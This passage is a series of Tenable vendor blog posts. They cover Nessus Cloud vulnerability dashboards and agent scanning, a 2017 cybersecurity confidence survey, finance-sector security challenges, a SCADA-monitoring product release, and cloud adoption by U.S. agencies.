You can use the dashboards to quickly get an overall view of vulnerabilities in your environment as well as to identify if you are meeting goals and policies set forth by your organization. Let’s say your organization has a policy that it will not tolerate more than 25 critical vulnerabilities open at any time. In the example below, even though there are 19 critical vulnerabilities open, you know you’re within policy; so maybe you could mix some vulnerability remediation work with another important project instead of just focusing on remediation efforts.

Dashboard overview of vulnerabilities in your system

This same dashboard helps you track how long vulnerabilities have been open. As I noted earlier, last year’s Verizon DBIR highlighted how often old vulnerabilities end up being the path attackers take to gain access to networks. The dashboard could help you identify critical vulnerabilities that could lead to actual breaches.

Starting with the dashboard, you can access an interactive list of all vulnerabilities that are more than 30 days old and easily drill down to details for a specific host exhibiting an old security hole.

Dashboard - how long vulnerabilities have been open
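The policy check and the aging drill-down described above reduce to two small computations. A hedged Python sketch; the record fields and the 25-critical/30-day thresholds follow the examples in the text and are illustrative, not a Nessus Cloud API:

```python
from datetime import date, timedelta

def within_policy(open_criticals, max_allowed=25):
    """True if the count of open critical vulnerabilities is within
    the organization's stated policy threshold."""
    return open_criticals <= max_allowed

def stale_vulns(vulns, today, max_age_days=30):
    """vulns: list of dicts with 'first_seen' (a date) and 'severity'.
    Returns those open longer than max_age_days, oldest first, mirroring
    the dashboard's 'more than 30 days old' drill-down."""
    cutoff = today - timedelta(days=max_age_days)
    old = [v for v in vulns if v["first_seen"] < cutoff]
    return sorted(old, key=lambda v: v["first_seen"])
```

With 19 open criticals against a 25-critical policy, `within_policy(19)` is true, matching the scenario in the text.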

Try Nessus Cloud

Nessus Cloud provides insight into the vulnerabilities on your network that should be given your immediate attention

If you aren’t already using Nessus Cloud and would like to try any of these vulnerability prioritization techniques, you can request a free Nessus Cloud evaluation. Try out the ideas from this article and see even more ways that Nessus Cloud provides insight into the vulnerabilities on your network that should be given your immediate attention.

Continue the vulnerability prioritization conversation on Tenable’s Discussion Forums at https://community.tenable.com/welcome, or on Twitter @TenableSecurity.

Thanks to Diane Garey for assisting with this blog.


Actively Monitoring a Mobile Workforce with SecurityCenter


As the boundaries of the traditional workplace expand from users in a single office building to mobile road warriors and remote workers, maintaining an effective vulnerability management program across all endpoints becomes more challenging. Systems and devices that are not connected to a local network cannot be scanned reliably and can introduce more risk to the organization. When more systems and technologies are placed outside of the corporate firewall, the organization can face additional challenges. For example, scanned systems with external IP addresses can frequently change from employer-owned devices to systems of another organization or nation. Or the systems hosting the scanners could themselves be compromised, reducing network protection, especially if normal defense-in-depth strategies are lacking. To address such issues, Tenable has an easy-to-use, secure and reliable solution.

Nessus Cloud

The Tenable Nessus® Cloud is a SaaS vulnerability management solution that combines the powerful detection, scanning and auditing features of Nessus with multi-user support. Nessus Cloud supports sharing of scanning resources like scanners, policies, and schedules; it also supports agent-based scanning. Nessus agent scanning enables administrators to install an agent on a local computer. Then as scans are scheduled, the agent will contact Nessus Cloud and run the policy defined for that agent group. 

Organizations that embrace and deploy Nessus Cloud agents greatly benefit from a consistent and scalable total vulnerability scanning solution

Organizations that embrace and deploy Nessus Cloud agents greatly benefit from a consistent and scalable total vulnerability scanning solution. Traditional models of vulnerability scanning assumed all systems and devices could be reached through internal networks. However, modern organizations need a model where any device can reside on an internal network, be relocated to another location in the office with all networked features intact, and used remotely at non-company locations such as a hotel while still being actively available for vulnerability scanning. With Nessus Agents, users and their computers can move to any internet-accessible network and still enable analysts to scan and assess the system. Pairing the functionality and depth of SecurityCenter® with the reach of Nessus Cloud, organizations greatly increase the visibility and coverage to scan systems across the world. This native functionality reduces complexities and enables organizations to seamlessly and quickly identify and triage vulnerabilities, regardless of where a device is in the world.

Nessus Cloud scalability and flexibility

Nessus Cloud scales to a large number of assets with Nessus Agents and helps you organize these systems into agent groups, which extends the asset list functionality in Tenable SecurityCenter. Agent groups enable you to group similar devices and then track groups by assigning the group a scan policy name in SecurityCenter. By using a scan policy name, SecurityCenter can use the plugin text found in Tenable Nessus plugin 19506 to identify the policy and create a Dynamic Asset. As the name implies, the asset is dynamic and automatically updates the asset list to be used for further analysis within SecurityCenter.

Here is a sample output from Nessus plugin 19506 identifying the host that was scanned in Nessus Cloud using an agent scan:

Plugin 19506 output

SecurityCenter supports two primary methods of scanning systems using Nessus Cloud: active and agent-based

SecurityCenter supports two primary methods of scanning systems using Nessus Cloud: active and agent-based. For active scanning, the Nessus Cloud instance operates like any other Nessus scanner you may already use for traditional vulnerability scanning. However, when an agent scan is required, the first step is to set up an agent scan policy in Nessus Cloud. Within SecurityCenter, go to Scans>Agent Scans and click on Add an Agent Scan.

Adding an agent scan in Nessus Cloud

For additional detailed information on how to configure the Nessus Agents, review the whitepaper about agent support.

Nessus Cloud scanning

When you configure scans within SecurityCenter to collect Nessus agent data, you can compare vulnerability data collected from agent scanning to data collected from active scanning. Based on plugin 19506, predefined assets are available to identify systems scanned with and without agents. The dynamic assets are:

  • Scanned by Nessus without Agent Software - Plugin 19506: This plugin output contains “Scan type : Normal” indicating a normal or active Nessus scan was performed on the system
  • Scanned with Linux, Unix, or macOS Agent - Plugin 19506: This plugin output contains “Scan type : Unix Agent” indicating a Linux, Unix, or macOS agent was used to collect the vulnerability data
  • Scanned with Windows Agent - Plugin 19506: This plugin output contains “Scan type : Windows Agent” indicating a Windows agent was used to collect the vulnerability data

You can also use these assets as filters in matrices and other components to review vulnerability data and to compare it to data collected via other methods.
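The scan-type matching behind these dynamic assets can be sketched as a simple parse of the plugin 19506 output. An illustrative Python sketch; the exact output formatting can vary between Nessus versions, so treat the parsing details as an assumption:

```python
def classify_scan(plugin_19506_text):
    """Map the 'Scan type' line of Nessus plugin 19506 output to an asset
    category, mirroring the dynamic asset rules listed above."""
    for line in plugin_19506_text.splitlines():
        if "Scan type" in line and ":" in line:
            value = line.split(":", 1)[1].strip()
            if value == "Normal":
                return "Scanned by Nessus without Agent Software"
            if value == "Unix Agent":
                return "Scanned with Linux, Unix, or macOS Agent"
            if value == "Windows Agent":
                return "Scanned with Windows Agent"
    return "Unknown"
```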

Incorporating Nessus Cloud scan data into your SecurityCenter workflow

When you use the Nessus Scan Summary dashboards within SecurityCenter, you can quickly see the number of devices identified on the network without applying an asset list:

Nessus scan summary dashboards

However, to derive more data from SecurityCenter, you can use the assets mentioned above to create a matrix that compares the data from each asset location. In the sample matrix below, test assets have been applied as the filter along with a vulnerability severity level. You can see further information by clicking on the cell in the matrix, and also by viewing the filters applied from the matrix in the Vulnerability Analysis screen:

Custom dashboard to compare data from each asset location

SecurityCenter and Nessus Cloud: the cloud-backed solution for device monitoring

By using SecurityCenter with Nessus Cloud, you can quickly set up a series of components to view in-depth information of devices and assets across the organization. Additionally, you can analyze the risk of local systems compared to systems detected by Nessus Cloud and Nessus Agents. Comparing data from these two asset groups can help you tailor updates and protective software to better suit each device in your unique environment.

Global Cybersecurity Confidence Declines


The newly released 2017 Tenable Network Security Global Cybersecurity Assurance Report Card, with research conducted by CyberEdge Group, updates findings from the 2016 Global Cybersecurity Assurance Report Card. With the addition of France, India and Japan, Tenable surveyed 700 security practitioners from nine different countries across seven industry verticals. The report assesses the overall confidence levels of information security professionals in detecting and mitigating organizational cyber risk.

Global trends

This year, overall confidence levels dropped six points to 70%, or a C-, reflecting a decline in perceptions of global cyber readiness, fueled by the challenges of assessing and mitigating cyber risks across the evolving threat landscape. According to the data, many IT security pros feel overwhelmed by the number of breaches, and are struggling to keep pace with cloud adoption, mobile computing, DevOps environments, containerization platforms, web apps and more.

Collectively, participants scored just 61% on the Risk Assessment Index, a 12-point drop from 2016, and 79% on the Security Assurance Index, which remains unchanged.

New to the 2017 report, containerization platforms and DevOps environments are a growing concern across all countries and industries. In fact, global cybersecurity practitioners gave themselves a D on their overall ability to assess risk, with failing grades for emerging tech, including containers (52%), DevOps (57%) and mobile (57%). Compared to last year, confidence in cloud security dipped seven points to 60% or a D-.
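The report's percentage-to-grade conversions (70% = C-, 60% = D-, below 60% failing) follow a conventional US grading scale. For readers who want to reproduce the grades quoted here, a small sketch of that mapping; the exact band edges are an assumption, not taken from the report's methodology:

```python
def letter_grade(score_pct):
    """Convert a percentage score to a letter grade on a conventional scale."""
    bands = [(93, "A"), (90, "A-"), (87, "B+"), (83, "B"), (80, "B-"),
             (77, "C+"), (73, "C"), (70, "C-"), (67, "D+"), (63, "D"), (60, "D-")]
    for cutoff, grade in bands:
        if score_pct >= cutoff:
            return grade
    return "F"  # below 60% is a failing grade
```

Applied to the figures above: 70% yields a C-, 60% a D-, and the 52% container score falls to an F, matching the grades in the report.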

There isn’t one contributing factor to the massive decline in Risk Assessment scores; it’s a by-product of the ephemeral nature of assets and the expanding attack surface

The biggest takeaway, however, is that there isn’t one contributing factor to the massive decline in Risk Assessment scores; it’s a by-product of the ephemeral nature of assets and the expanding attack surface. The modern enterprise network includes mobile, cloud, web apps, internet of things, BYOD, containers and virtual machines that must be constantly maintained and secured. Technology drives innovation, but it also creates more complexities and room for vulnerabilities to work their way into the network.

While alarming, the 12-percentage-point drop in Risk Assessment indicates that respondents understand the challenges of today’s complex and interconnected attack surface while acknowledging gaps in their ability to assess risk in emerging technologies.

Staying positive

Although overall confidence was down in five out of the six returning countries and five out of seven industries, levels of optimism remained comparable to last year, with 43% of respondents feeling “somewhat more optimistic,” compared to 38% last year.

Additionally, the two highest global Security Assurance Index scores were the ability of security professionals to measure security effectiveness: 83% or B, and the ability to convey risk to business executives and the board: 80% or B-.

This signifies a level of growth and maturity among security professionals, and their commitment to aligning security with business objectives. Higher Security Assurance grades mean that respondents feel comfortable talking about and reporting on network security, and sharing information with the C-suite.

The road to improvement

It’s more important than ever to have continuous visibility into all assets across cloud, hybrid and on-premises environments

What can security professionals do to improve Risk Assessment and Security Assurance scores? One of the best starting points is to know exactly what is on a network at all times. You can’t secure what you don’t know about, and in today’s highly distributed and complex IT landscape, it’s more important than ever to have continuous visibility into all assets across cloud, hybrid and on-premises environments. Staying ahead of the security challenges that accompany new trends and technologies is also a priority.

Change often occurs at the highest level, so it’s also important to measure security effectiveness and to communicate risk up the chain. One way for infosec pros to convince business executives that cybersecurity should be treated as a top business concern is to have the right metrics and reporting procedures in place, readily available and easily digestible for decision makers who lack in-depth security expertise. That starts with having a resilient security program with the right visibility and context needed to not only identify network threats, but also provide data and benchmarks to drive improvement.

More information

You can access the full 2017 Global Cybersecurity Assurance Report Card, download infographics and other assets, and read about the survey methodology in more detail on the 2017 Global Cybersecurity Assurance Report Card landing page. To compare year-over-year results, check out the 2016 Global Cybersecurity Assurance Report Card landing page and summary blog. And stay tuned for on-demand webinars coming in early January 2017.

Top 3 Cybersecurity Challenges Facing the Finance Sector in 2017


The finance sector is no stranger to adversity. Financial service organizations have been beleaguered by recessions, lackluster stock prices, unprecedented competition, tough new regulations, and constant cyberattacks. In fact, these recent challenges have changed the entire industry. Battle-tested, the organizations that survived this chaotic time are poised to flex their leaner, more mobile and agile capabilities in 2017. By many indications, next year appears to be one where we start to see a stronger, grittier sector, a stark contrast to the banking systems of the past.

When I started working in this sector about a decade ago, IT security meant an access control policy, a firewall and a robust anti-virus platform. Today, large banks are often pioneering proprietary, leading-edge cybersecurity software. The close collaboration between banking IT security and top cybersecurity companies is unlike any other sector.

Large banks are often pioneering proprietary, leading-edge cybersecurity software

Banks are more prepared to handle cybersecurity threats these days, but challenges still loom. Take a look at the top three challenges that financial organizations will face in the new year:

1: Emerging technology challenges

Recently, the world suffered from distributed denial of service (DDoS) attacks spawned from a botnet made up of so-called smart devices within the Internet of Things (IoT). Shortly after one attack, the perpetrator publicly released the code used in the DDoS assault on the KrebsOnSecurity website, making it available for anyone to use.

The code, called Mirai, is designed to search for and attack internet-connected devices that are protected by default passwords and usernames. Because Mirai is basically now an open source hacking tool that can tap into millions of unsecured IoT devices and sensors, organizations in all sectors are going to be vulnerable to DDoS assaults.

A challenge in the finance sector that makes this style of attack potentially crippling is that banks need to provide customers access to their money. A website taken down by a DDoS attack could anger a lot of customers, something no bank ever wants to face.

2: Nefarious insider challenges

Attacks from insider threats will also pose a larger problem in 2017. In particular, dark web actors who reach out to insiders to buy their login credentials, or who attempt to get insiders to sell intellectual property, will be a big problem. An insider threat may not just be a disgruntled employee; it could be someone who is tempted by outside influences and bribed to share inside information.

Retail banks, or those that still operate with a large physical presence, use tellers. According to a recent study by scheduling-software company FMSI: "many banks struggle with finding and keeping good part-time [tellers] employees, leading to undesirable results."

Tellers are often not happy with their jobs, are underpaid, deal with the threat of armed robbery and stand all day dealing with constant, complex customer issues. Their job also requires a lot of skill and training and is now more “digital” than ever before. Someone working a job like that is a perfect target for organizations looking for insider information for an attack. Offering several thousand dollars for a password or other security information can be quite compelling.

Financial organizations will need to build and bolster insider threat detection programs in 2017 or face a new wave of successful attacks.

3: Regulation challenges

New regulations are something most banks will have to face in 2017. For example, in the U.S., a Labor Department financial-advice rule that goes into effect in April 2017 will change the way customers interact with Wealth Management Advisors. This regulation is an attempt to provide greater fee transparency between financial planners and those saving for retirement. For financial companies, the regulation will change the way they do business on the back end. It also introduces new risks for companies that do not properly communicate the changes to existing and future customers.

As a result, U.S. financial institutions with Wealth Management Advisors will have to implement new IT infrastructures, which could result in new information silos.

Turning to the EU, the recently adopted General Data Protection Regulation (GDPR), which among other things addresses the export of personal data outside the EU, will take effect in May 2018. That will have a big effect on how international banks operate:

Financial institutions and service providers to the financial industry process a vast amount of personal data on a daily basis. Much of the data processed is confidential and sensitive. This means there are increased risks and a likelihood of a focus on this sector by supervisory authorities, which will have new rights to audit and to impose administrative fines. Indeed, the GDPR allows for administrative fines which can amount to a maximum of 20 million euros or 4 percent of the global annual turnover of a company. – Financier Worldwide

Facing a fine of 20 million euros or four percent of global turnover is a big risk banks will have to begin guarding against in 2017.
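The GDPR cap quoted above is whichever is greater: a fixed 20 million euros or 4 percent of global annual turnover. A quick illustration of the arithmetic:

```python
def gdpr_max_admin_fine(global_annual_turnover_eur):
    """Maximum administrative fine under GDPR Art. 83(5): the greater of
    EUR 20 million or 4% of global annual turnover."""
    return max(20_000_000, 0.04 * global_annual_turnover_eur)
```

For a bank with EUR 5 billion in annual turnover, the cap is EUR 200 million; the fixed 20-million-euro floor only dominates for companies with turnover below EUR 500 million.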

Solutions for 2017

All three challenges facing the finance sector share a common denominator: transparency. Meeting them requires that Security Operations Centers, IT security personnel and IT leaders have real-time visibility into the status of their networks and the level of insider threat.

All three challenges facing the finance sector share a common denominator: transparency

Continuous active scanning, passive detection, log analysis, vulnerability management and compliance testing across the complete organization are critical to crossing the three big hurdles facing this industry in 2017.

Tenable products can assist organizations in meeting these challenges. SecurityCenter Continuous View® (SecurityCenter CV™) provides a real-time, holistic view of all IT assets, network activity and device events that helps you locate exploits and address vulnerabilities quickly. SecurityCenter's highly customizable dashboards also help support compliance testing across an organization.

These customizable dashboards can be fine-tuned to deliver targeted analyses of cybersecurity risks. For example:

  • The Monetary Authority of Singapore (MAS) published new Technology Risk Management (TRM) Guidelines in June 2013. As a result, Tenable developed the MAS TRM Guidelines dashboard, which provides a high-level overview of information relevant to specific sections in the TRM Guidelines.
  • The GLBA Malicious Code Prevention dashboard tracks compliance with the Gramm-Leach-Bliley Act (GLBA), which protects the private information of individuals.
  • The SEC Risk Alert dashboard presents data to assist in the evaluation of an organization’s cybersecurity preparedness, as defined by the U.S. Securities and Exchange Commission.

SEC Risk Alert Dashboard in SecurityCenter

These are just a few of the many detailed SecurityCenter dashboards that can help combat the major challenges facing security and IT professionals in the financial services industry.

Armed with the right tools, the future for finance in 2017 is brighter than it has been in many years.

The finance sector may be no stranger to adversity, but with Tenable solutions, financial organizations can detect emerging threats and perform the real-time discovery of resources necessary to protect their networks and surpass compliance standards. Armed with the right tools, the future for finance in 2017 is brighter than it has been in many years.

Improved SCADA Visibility and Reporting with PVS 5.2


At Tenable, our goal is to provide solutions that enable our customers to secure their organizations and improve visibility into their security posture. As part of this commitment, we are pleased to announce the release of Passive Vulnerability Scanner® (PVS™) 5.2, which includes a new SCADA (Supervisory Control And Data Acquisition) analysis module as well as additional enhancements and improvements to provide a deeper understanding of your environment.

Deep visibility into SCADA assets discoverable by PVS

PVS 5.2 includes a new analysis module that analyzes SCADA network traffic to discover SCADA assets and their vulnerabilities. This module provides the same capabilities as SCADA plugins that are used by PVS versions older than 5.2, with an improvement in performance. The module also provides deep visibility into the type of SCADA devices discovered.
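The kind of traffic classification such a module performs can be illustrated with a minimal sketch. This is not Tenable code; it is a hypothetical example showing how a passive analyzer might recognize one common SCADA protocol, Modbus/TCP, by validating the MBAP header of captured payloads. The flow records and helper names are illustrative.

```python
import struct

def looks_like_modbus(payload: bytes) -> bool:
    """Return True if payload plausibly starts with a Modbus/TCP ADU."""
    if len(payload) < 8:
        return False
    _tid, proto_id, length, _unit, func = struct.unpack(">HHHBB", payload[:8])
    # Modbus/TCP: the protocol identifier is always 0; the length field
    # counts the unit id plus the PDU; public function codes are 1-127
    # (the high bit set marks an exception response).
    return proto_id == 0 and length == len(payload) - 6 and 1 <= (func & 0x7F) <= 127

def discover(flows):
    """Label source hosts whose traffic to port 502 parses as Modbus/TCP."""
    assets = {}
    for src_ip, dst_port, payload in flows:
        if dst_port == 502 and looks_like_modbus(payload):
            assets[src_ip] = "Modbus/TCP"
    return assets

# A read-holding-registers request (function code 3) to unit 1.
sample = struct.pack(">HHHBB", 1, 0, 6, 1, 3) + struct.pack(">HH", 0, 10)
print(discover([("10.0.0.5", 502, sample)]))  # {'10.0.0.5': 'Modbus/TCP'}
```

A production analyzer would of course cover many more protocols and fingerprint device types and firmware, but the principle is the same: assets are identified entirely from observed traffic, with no packets sent to the fragile SCADA devices themselves.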

We have also added several new SCADA Top-N charts to the dashboard in PVS to provide a high-level summary of SCADA assets, their vulnerabilities, and protocols used by those assets. These include:

  • SCADA Vulnerability Distribution by Severity
  • Top 10 SCADA Hosts
  • SCADA Host Distribution by Protocol
  • SCADA Host Distribution by System Type

Once enabled, these dashboard charts focus directly on SCADA assets to provide a deeper visibility into your SCADA environment:

PVS SCADA dashboards

PVS SCADA Host Distribution

Improved visibility into network connections

The connection reporting features of the Tenable Network Monitor (TNM) are now available within PVS 5.2 as part of a new Connection Analysis Module. This module eliminates the need for TNM to obtain connection duration and bandwidth information, and extends the platform support to all platforms supported by PVS. Connection duration and bandwidth reporting for IPv6 and tunneled traffic is a new addition and is also available within this module.

Connection analysis event trending
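The bookkeeping behind this kind of connection reporting can be sketched in a few lines. This is an illustrative example, not Tenable code: it folds per-packet records into per-flow duration and byte totals, which is the essence of what a connection analysis module tracks. The record format and function name are assumptions for the sketch.

```python
def summarize(records):
    """Aggregate (src, dst, timestamp_seconds, payload_bytes) records
    into per-connection duration and bandwidth totals."""
    flows = {}
    for src, dst, ts, nbytes in records:
        key = (src, dst)
        if key not in flows:
            flows[key] = {"first": ts, "last": ts, "bytes": 0}
        f = flows[key]
        f["first"] = min(f["first"], ts)  # earliest packet seen
        f["last"] = max(f["last"], ts)    # latest packet seen
        f["bytes"] += nbytes
    return {
        key: {"duration": f["last"] - f["first"], "bytes": f["bytes"]}
        for key, f in flows.items()
    }

records = [
    ("10.0.0.5", "10.0.0.9", 0.0, 1200),
    ("10.0.0.5", "10.0.0.9", 4.5, 800),
]
print(summarize(records))
# {('10.0.0.5', '10.0.0.9'): {'duration': 4.5, 'bytes': 2000}}
```

A real monitor would key flows on the full 5-tuple (including ports and protocol) and expire idle connections, but the same accumulation works unchanged for IPv6 or tunneled traffic, which is why extending the reporting there is natural.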

Additional enhancements

Other enhancements in PVS 5.2 include improved performance in 10Gbps network traffic analysis, improved support for reporting on hosts within a VLAN, and support for additional versions of OS X.

More information

For more detailed information about the enhancements, improvements, and benefits of PVS 5.2, please see our PVS 5.2 Release Notes and the PVS 5.2 User Guide.

Clearing a Path to the Cloud for Government Agencies


The U.S. government is committed to cloud computing and steps are being taken by Congress to make the necessary funding available. But there are practical challenges that remain in creating a clear path to the cloud. Tenable is working to help clear that path.

Cloud computing promises economy, flexibility and scalability. In 2017, the U.S. government plans to accelerate its use of the cloud to take advantage of these benefits.

Agencies must have confidence in the security and reliability of cloud computing, and have a practical acquisition strategy

Despite the benefits of cloud computing, cloud adoption by federal agencies has been slow. To speed things along, Congress is considering legislation that would establish IT modernization funds for agencies. But there are challenges other than money in moving to the cloud. Agencies must also have confidence in the security and reliability of cloud computing, and have a practical acquisition strategy for these services.

Companies such as Tenable are working with government agencies to address these challenges and provide a clear path to the cloud, developing products to help with the accreditation and secure operation of cloud offerings.

It’s more than just money

One of the touted advantages of the cloud is ease of adoption. Offered as a service, cloud computing does not require large capital expenditures. But there still are costs in moving to the cloud. Existing platforms must be operated while new ones are being developed, and legacy systems must remain available until the new platform is proven. The Modernizing Government Technology Act (MGT Act) would create pools of money for agencies that could be used for cloud adoption. Money would be paid back to these revolving funds from savings realized from the cloud and by retiring legacy systems that now consume more than 70 percent of the federal IT budget.

Even with money in hand, agencies will be cautious about moving IT resources. They must gain confidence in the cloud’s ability to support mission-critical operations and protect sensitive information.

Achieving the necessary confidence and level of comfort is not a simple matter. Each agency has a different mission and different needs. Within each agency, there are a variety of operations and data with differing levels of sensitivity, requiring different levels of security. Moving everything at once is impractical and unnecessary. Each agency will make its own decisions about what to move first, which assets to trust to the cloud, and which to keep on-prem.

Accrediting and acquiring cloud services remains a long and arduous process

Acquisition is a separate issue. Despite programs intended to ease the pain, accrediting and acquiring cloud services and assuring their continued security remains a long and arduous process.

A hybrid solution

A hybrid cloud environment can help in establishing the necessary level of comfort with cloud computing. This allows an agency to move public-facing and other non-critical operations and data to a service provider’s cloud, while retaining mission-critical data in-house. Interconnecting the platforms enables operations as a single enterprise. Assets can be moved in and out of the cloud as the level of comfort and circumstances dictate.

Achieving the necessary confidence and level of comfort is not a simple matter ... A hybrid cloud environment can help

Building confidence in the cloud and enabling rational acquisition of services requires visibility into, and continuous monitoring of, activity on networks and systems. With that visibility, agencies can be confident in the security of their cloud assets, and service offerings can be assessed and accredited more efficiently.

Industry assistance

Tenable understands the challenges of cloud adoption and is addressing these concerns to facilitate the transition to cloud computing. Enabling agencies to continuously monitor, analyze and manage vulnerabilities in this environment; providing hybrid environments for both cloud-based and on-prem security solutions; and customizing security controls for each agency helps to create a clear path to the cloud for agencies.

To learn more about Tenable cloud solutions, contact federal@tenable.com.
